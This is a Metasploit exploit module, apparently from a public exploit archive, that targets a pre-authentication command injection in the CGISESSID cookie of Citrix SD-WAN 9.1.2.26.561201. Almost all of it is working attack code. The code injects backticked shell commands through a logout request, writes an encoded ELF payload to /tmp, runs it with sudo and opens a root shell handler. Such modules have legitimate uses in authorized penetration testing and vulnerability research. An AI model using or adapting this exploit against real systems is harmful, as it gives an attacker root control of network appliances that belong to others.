Citrix SD-WAN 9.1.2.26.561201 Remote Command Injection

`# Exploit Title: Citix SD-WAN logout cookie preauth Remote Command Injection Vulnerablity   
# Date: 02/20/2017  
# Exploit Author: xort @ Critical Start  
# Vendor Homepage: www.citrix.com  
# Software Link: https://www.citrix.com/downloads/cloudbridge/  
# Version: 9.1.2.26.561201  
# Tested on: 9.1.2.26.561201 (OS partition 4.6)  
#   
# CVE : (awaiting cve)  
  
# vuln: CGISESSID Cookie parameter  
# associated vuln urls:  
# /global_data/   
# /global_data/headerdata   
# /log  
# /  
# /r9-1-2-26-561201/configuration/   
# /r9-1-2-26-561201/configuration/edit   
# /r9-1-2-26-561201/configuration/www.citrix.com [CGISESSID cookie]  
#  
# Description PreAuth Remote Root Citrix SD-WAN <= v9.1.2.26.561201. This exploit leverages a command injection bug.   
#  
# xort @ Critical Start  
  
require 'msf/core'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
include Exploit::Remote::Tcp  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Citrix SD-WAN CGISESSID Cookie Remote Root',  
'Description' => %q{  
This module exploits a remote command execution vulnerability in the Citrix SD-WAN Appliace Version <= v9.1.2.26.561201. The vulnerability exist in a section of the machine's session checking functionality. If the CGISESSID cookie holds shell-command data - it is used in a call to system where input is processed unsanitized.  
},  
'Author' =>  
[  
'xort@Critical Start', # vuln + metasploit module  
],  
'Version' => '$Revision: 1 $',  
'References' =>  
[  
[ 'none', 'none'],  
],  
'Platform' => [ 'linux'],  
'Privileged' => true,  
'Arch' => [ ARCH_X86 ],  
'SessionTypes' => [ 'shell' ],  
'Payload' =>  
{   
'Compat' =>  
{  
'ConnectionType' => 'find',  
}  
},  
  
'Targets' =>  
[  
['Linux Universal',  
{  
'Arch' => ARCH_X86,  
'Platform' => 'linux'  
}  
],  
],  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('CMD', [ false, 'Command to execute', "" ]),   
Opt::RPORT(443),  
], self.class)  
end  
  
def run_command(cmd)  
  
vprint_status( "Running Command...\n" )  
  
# send request with payload   
res = send_request_cgi({  
'method' => 'POST',  
'uri' => "/global_data/",  
'vars_post' => {  
'action' => 'logout'  
},  
'headers' => {  
'Connection' => 'close',  
'Cookie' => 'CGISESSID=e6f1106605b5e8bee6114a3b5a88c5b4`'+cmd+'`; APNConfigEditorSession=0qnfarge1v62simtqeb300lkc7;',  
}  
  
})  
  
  
# pause to let things run smoothly  
sleep(2)  
  
  
end  
  
  
def exploit  
# timeout  
timeout = 1550;  
  
# pause to let things run smoothly  
sleep(2)  
  
#if no 'CMD' string - add code for root shell  
if not datastore['CMD'].nil? and not datastore['CMD'].empty?  
  
cmd = datastore['CMD']  
  
# Encode cmd payload  
  
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2')  
  
# upload elf to /tmp/n , chmod +rx /tmp/n , then run /tmp/n (payload)  
run_command("echo -e #{encoded_cmd}>/tmp/n")  
run_command("chmod 755 /tmp/n")  
run_command("sudo /tmp/n")  
else  
# Encode payload to ELF file for deployment  
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)  
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2')  
  
# upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)  
run_command("echo -e #{encoded_elf}>/tmp/m")  
run_command("chmod 755 /tmp/m")  
run_command("sudo /tmp/m")  
  
# wait for magic  
handler  
  
end  
  
  
end  
end  
`